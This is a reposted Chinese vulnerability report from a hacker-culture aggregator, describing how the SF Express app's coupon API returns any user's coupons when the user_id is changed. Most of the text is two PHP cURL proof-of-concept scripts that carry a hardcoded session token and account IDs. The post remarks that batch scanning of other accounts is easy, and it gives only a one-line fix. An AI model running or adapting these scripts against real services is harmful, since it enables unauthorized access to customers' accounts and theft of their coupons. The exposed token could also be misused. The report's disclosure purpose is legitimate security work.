记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

顺丰app验证用户漏洞可以批量获得他人优惠券

2015-02-09 01:40

code 区域
$nn=800008231073;

$url = "http://abs-core.sf-express.com/api/user/getCoupons";

$ch = curl_init();

$request='status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id='.$nn;

curl_setopt($ch, CURLOPT_POSTFIELDS, $request);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008495436'));

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,1);

curl_setopt($ch, CURLOPT_NOSIGNAL,500);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

$re=curl_exec($ch);

curl_close($ch);

$re= json_decode($re);

print_r($re);



以上是demo

$nn是账号id,可以随意换,很容易做个批量扫描软件.

漏洞证明:

QQ截图20141225162220.jpg



譬如这是扫描出来的优惠券

修复方案:

array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008495436'));

对这个进行验证



code 区域
<?php

login('800008231073');



function login($nn) { //login

$url = "http://abs-core.sf-express.com/api/user/getCoupons";

$ch = curl_init();

$request='status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id='.$nn;

curl_setopt($ch, CURLOPT_POSTFIELDS, $request);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008490435'));

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,1);

curl_setopt($ch, CURLOPT_NOSIGNAL,500);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

$re=curl_exec($ch);

curl_close($ch);

$re= json_decode($re);

print_r($re);

return $re;

}

?>

知识来源: www.wooyun.org/bugs/wooyun-2015-088606

阅读:91619 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“顺丰app验证用户漏洞可以批量获得他人优惠券”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词